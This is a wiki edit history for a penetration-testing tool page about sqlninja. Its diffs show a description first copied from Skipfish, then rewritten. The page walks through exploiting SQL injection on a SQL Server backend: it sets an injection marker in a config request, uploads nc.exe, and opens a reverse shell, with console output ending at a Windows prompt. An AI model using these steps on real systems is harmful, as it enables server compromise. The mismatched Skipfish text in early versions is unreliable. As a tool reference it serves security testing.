Recent changes to sqlninja-en

sqlninja-en modified by Maguey

Maguey — Tue, 10 Dec 2019 16:20:37 -0000

--- v5
+++ v6
@@ -1,5 +1,5 @@
 
-[[img src=https://sourceforge.net/p/maguey/wiki/Home/attachment/LogoMaguey.png height=25% width=25% style=float:right]]
+[[img src=https://sourceforge.net/p/maguey/wiki/repo_img/attachment/MAGUEY-2-Logo.png height=25% width=25% style=float:right]]
 



 Back  Español

sqlninja-en modified by Maguey

Maguey — Wed, 11 Dec 2013 22:12:09 -0000

--- v4
+++ v5
@@ -92,7 +92,7 @@
 Sqlninja rel. 0.2.6-r1

 Copyright (C) 2006-2011 icesurfer 

 [+] Parsing sqlninja.conf...

-[+] Target is: 172.22.3.89:80

+[+] Target is: xxx.xxx.xxx.xxx:80

 [+] Trying to inject a 'waitfor delay'....

    [+] Injection was successful! Let's rock !! :) 

 

@@ -129,7 +129,7 @@
 Sqlninja rel. 0.2.6-r1

 Copyright (C) 2006-2011 icesurfer 

 [+] Parsing sqlninja.conf...

-[+] Target is: 172.22.3.89:80


+[+] Target is: xxx.xxx.xxx.xxx:80


 Local port: PUERTO_LOCAL

 tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP

 [+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...

sqlninja-en modified by Maguey

Maguey — Wed, 11 Dec 2013 22:03:39 -0000

--- v3
+++ v4
@@ -14,55 +14,48 @@
 

 Description: 
-Tool that performs a vulnerability scan on web applications. It runs in two modes, the first one performs a spidering  of the web application and the second one uses dictionary based brute force attacks.
+Tool specialized in exploiting SQL Injection vulnerabilities present on web applications with a SQL Server database backend. Its functionalities range from data mining to compromise the application server through an uploaded shell.

 

 Objective:
 
-Detect vulnerabilities on the web application.
+
Compromise the application server by exploiting a SQL Injection.
 

 

 Features:
-Supported technologies: Web applications (HTTP).
+Supported technologies: Web applications (HTTP/HTTPS) with a SQL Server database backend.

 Operative mode: Active.

 
-Detect vulnerabilities on the web application.
+Compromise the application server by exploiting a SQL Injection.
 

-Performs a predefined and configurable spidering on the web application; configurations include domain on the scope, restricted URLs and parameters, etc.
-
dentify common vulnerabilities such as Cross Site Script, SQL Injection, Path Traversal, Information Disclosure, etc.
-
Provides a configurable dictionary base brute force attack functionality in order to detect commons resources such as administrative, default and test pages, files backups (.old), etc.
-
Has the capability to include self-defined dictionaries to be used on the brute force module.
+
Provides information about the database configuration.
+
Provides a file upload functionality  in order to execute malicious file in the application server.
+
Performs a dictionary based brute force attack to retrieve the “sa” account password.
+
Provide a functionality to execute operative systems commands.
 
 

 
 Reports:

-Output reports:  ✔
-

-Reports in HTML format which includes the visited URLS and detected vulnerabilities divided into three sections:
-

-URL: URLs detected by the spidering module.
-
Document type: URL categorization by content based on the response.
-
Detected vulnerabilities: URL groups by matching vulnerabilities.
-
+Output reports:  X
 

 

 Basic usage:
-Obtener una Reverse Shell del servidor base de datos. Llenar el archivo de configuración de sqlninja con los siguientes datos:
+Create a Reverse Shell on the database server. Edit the sqlninja configuration file to include the following information:
 
-Petición HTTP con parámetro vulnerable.
-
IP local. 
+
Petition with the vulnerable parameter.
+
Local IP address.
 
 

-El archivo lucirá de la siguiente manera:
+The configuration file will be similar to the following:

 
 … 

@@ -92,7 +85,7 @@

 



-Una vez que se termina de llenar el archivo de configuración se procede a ejecutar la herramienta, esta nos indicará con el mensaje Injection was successful! Let's rock !! :) que la vulnerabilidad es explotable.
+Once the configuration is in place it can be used by the tool which will display the message “Let’s rock !!! :)” in case the SQL Injection is successful.

 
 root@maguey:/tools/explotation/sqlninja # ./sqlninja -m t

@@ -104,7 +97,7 @@
    [+] Injection was successful! Let's rock !! :) 

 



-Ejecute el comando . /sqlninja -m u y eleja la opción apps/nc.exe. 
+Execute the following command “. /sqlninja -m u“ and select the option “apps/nc.exe”.

 
 root@maguey:/tools/explotation/sqlninja # ./sqlninja -m u

@@ -129,7 +122,7 @@
 [+] Filesize corresponds... :)
 



-La herramienta subirá un archivo con el objetivo de ejecutar un Reverse Shell, utilice el siguiente comando para lograrlo ./sqlninja -m r.
+The tool will upload the file with the objective to create a reverse shell by using the following command “./sqlninja -m r”.

 
 root@maguey:/tools/explotation/sqlninja # ./sqlninja -m r

sqlninja-en modified by Maguey

Maguey — Wed, 11 Dec 2013 21:57:02 -0000

--- v2
+++ v3
@@ -7,7 +7,7 @@
 sqlninja
 

-Phase(s):1769242397
+Phase(s):
 Primary: Exploitation.
 Secondary:  N/A.

sqlninja-en modified by Maguey

Maguey — Wed, 11 Dec 2013 21:05:24 -0000

--- v1
+++ v2
@@ -4,7 +4,7 @@

 Back  Español

-Skipfish
+sqlninja
 

 Phase(s):1769242397

sqlninja-en modified by Maguey

Maguey — Wed, 11 Dec 2013 21:04:58 -0000

Back Español

Skipfish

Phase(s):

1769242397
Primary: Exploitation.
Secondary: N/A.

Description:

Tool that performs a vulnerability scan on web applications. It runs in two modes, the first one performs a spidering of the web application and the second one uses dictionary based brute force attacks.

Objective:

Detect vulnerabilities on the web application.

Features:

Supported technologies: Web applications (HTTP).

Operative mode: Active.

Detect vulnerabilities on the web application.

Performs a predefined and configurable spidering on the web application; configurations include domain on the scope, restricted URLs and parameters, etc.
dentify common vulnerabilities such as Cross Site Script, SQL Injection, Path Traversal, Information Disclosure, etc.
Provides a configurable dictionary base brute force attack functionality in order to detect commons resources such as administrative, default and test pages, files backups (.old), etc.
Has the capability to include self-defined dictionaries to be used on the brute force module.

Reports:
Output reports: ✔
Reports in HTML format which includes the visited URLS and detected vulnerabilities divided into three sections:

URL: URLs detected by the spidering module.
Document type: URL categorization by content based on the response.
Detected vulnerabilities: URL groups by matching vulnerabilities.

Basic usage:

Obtener una Reverse Shell del servidor base de datos. Llenar el archivo de configuración de sqlninja con los siguientes datos:

Petición HTTP con parámetro vulnerable.
IP local.

El archivo lucirá de la siguiente manera:

…
########### HTTP REQUEST ############
# The entire HTTP request, including the exploit string and a marker for the
# SQL command to execute (__SQL2INJECT__)
# Be sure to include the vulnerable parameter and the character sequence that
# allows us to start injecting commands. In general this means, at least:
# - an apostrophe (if the parameter is a string)
# - a semicolon (to end the original query)

--httprequest_start--
POST http://URL/PAGE.aspx HTTP/1.1
Host: HOST_APPLICACION
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0)
OTRAS_CABECERAS

__VIEWSTATE=%2FwEPDwUKMjA3NjE4MDczNmRkf2IECGUitTpu0vVIUhu3wPxao%2FF6r4sHEdlYxzYXX%2F8%3D&
__EVENTVALIDATION=%2FwEWAwLv6%2FCgCgL%2F%2BOneAgKfwImNC3%2Fnbpb9DZ7tw0IU78vRV%2BiuANd7HLE5bz%2B5vRy0MIk6&param_vulnerable=Dato';__SQL2INJECT__&ctl02=Search%21
--httprequest_end—

…

# Local host: your IP address (for backscan and revshell modes)
lhost = localhost

…

Una vez que se termina de llenar el archivo de configuración se procede a ejecutar la herramienta, esta nos indicará con el mensaje Injection was successful! Let's rock !! :) que la vulnerabilidad es explotable.

root@maguey:/tools/explotation/sqlninja # ./sqlninja -m t
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer
[+] Parsing sqlninja.conf...
[+] Target is: 172.22.3.89:80
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !! :)

Ejecute el comando . /sqlninja -m u y eleja la opción apps/nc.exe.

root@maguey:/tools/explotation/sqlninja # ./sqlninja -m u
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer
[+] Parsing sqlninja.conf...
[+] Target is: HOST_ATAQUE
Specify the binary or script file to upload
shortcuts:
1: apps/nc.exe
2: apps/dnstun.exe
3: apps/churrasco.exe
4: apps/icmpsh.exe
5: apps/vdmallowed.exe
6: apps/vdmexploit.dll
> 1
[+] Uploading /tmp/nc.scr debug script............
1540/1540 lines written
done!
[+] Converting script to executable... might take a while
[+] Checking that nc.exe has the expected filesize...
[+] Filesize corresponds... :)

La herramienta subirá un archivo con el objetivo de ejecutar un Reverse Shell, utilice el siguiente comando para lograrlo ./sqlninja -m r.

root@maguey:/tools/explotation/sqlninja # ./sqlninja -m r
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer
[+] Parsing sqlninja.conf...
[+] Target is: 172.22.3.89:80

Local port: PUERTO_LOCAL
tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP
[+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...

Microsoft Windows #### [Version #####]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami
whoami
HOSTNAME\USERNAME

Resources:

Link: http://sqlninja.sourceforge.net/
Author(s): icesurfer
Contact: r00t [at] northernfortress.net
License: GPL versión 3